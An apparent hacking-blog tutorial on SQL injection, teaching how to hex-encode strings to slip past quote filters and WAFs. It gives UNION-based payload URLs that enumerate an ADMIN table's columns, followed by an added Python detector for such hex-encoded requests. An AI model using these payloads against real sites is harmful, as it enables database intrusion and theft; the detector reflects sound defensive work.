Monday 3 August 2015

Converting Syntax in Hex Value - SQLi Tips

Syntax in Hex Value
After a long time, I'm back with another tutorial on SQL injection. In this tutorial we will discuss converting syntax to hex values. Many noobs like me don't know how hex values are used.
Sometimes, during regular manual injection, we come across sites where we can't get data from our SQLi command.

For example, we give a command to print our name on the web page.
Normally we add the name in the vulnerable column, enclosed in single quotes (') before and after the name.

https://www.Target-Site.com/product.php?id=11 and false union select 1,2,group_concat('RAi Jee'),3,4-- -

When we execute this command, sometimes it doesn't work. Actually, this shit happens because some sites' WAFs block the use of single quotes (magic quotes).
In such cases we have to deal with it by converting our syntax to a hex value.
We can convert our syntax to hex with HackBar, but here is an online website that also converts our syntax to a hex value.
Link: www.asciitohex.com

Our syntax: RAi Jee
Hex value: 524169204a6565
We have to put 0x before our hex value so that the database treats it as a hex literal.
https://www.Target-Site.com/product.php?id=11 and false union select 1,2,group_concat(0x524169204a6565),3,4-- -

We can do the same for other purposes where single quotes don't work.

https://www.Target-Site.com/product.php?id=11 and false union select 1,2,group_concat(column_name),3,4 from information_schema.columns where table_name='ADMIN'-- -
If it doesn't work, then we encode our syntax as a hex value.

0x41444d494e (hex value of ADMIN)

https://www.Target-Site.com/product.php?id=11 and false union select 1,2,group_concat(column_name),3,4 from information_schema.columns where table_name=0x41444d494e-- -

We can also encode our HTML tags to hex values whenever single quotes can't be used.
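Seen from the defending side, the 0x literals above can be decoded back to quoted strings before filter or detection rules run. The following is an added example, not part of the original post: it decodes hex literals in query parameters and flags those that appear together with the SQL keywords used in this post. The host name, function names and sample requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# MySQL-style hex literal: 0x followed by an even number of hex digits.
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-fA-F]{2})+)\b")
# Keywords taken from the queries shown in this post (assumed rule set).
SQL_MARKERS = re.compile(r"\bunion\b.+\bselect\b|information_schema|group_concat", re.I | re.S)


def decode_hex_literals(value):
    """Return (normalized_value, decoded_strings) for one parameter value."""
    decoded = []

    def to_quoted(match):
        raw = bytes.fromhex(match.group(1))
        text = raw.decode("utf-8", errors="replace")
        # Leave short or non-printable values alone: 0x1F is more likely a number.
        if len(raw) < 3 or not text.isprintable():
            return match.group(0)
        decoded.append(text)
        return "'" + text.replace("'", "''") + "'"

    return HEX_LITERAL.sub(to_quoted, value), decoded


def inspect_request(url):
    """Flag parameters that combine SQL keywords with hex-encoded strings."""
    findings = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        normalized, decoded = decode_hex_literals(value)
        if decoded and SQL_MARKERS.search(normalized):
            findings.append({"param": name, "decoded": decoded, "normalized": normalized})
    return findings


# Constructed sample request lines (placeholder host, not real traffic).
SAMPLES = [
    "https://shop.example/product.php?id=11 and false union select 1,2,group_concat(0x524169204a6565),3,4-- -",
    "https://shop.example/product.php?id=11 and false union select 1,2,group_concat(column_name),3,4 "
    "from information_schema.columns where table_name=0x41444d494e-- -",
    "https://shop.example/product.php?id=11&color=0xFF00AA",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(inspect_request(line) or "clean", "<-", line)
```

The normalized value is what quote-based rules should be matched against; a rule that only inspects the raw request never sees the quoted string.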

AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee
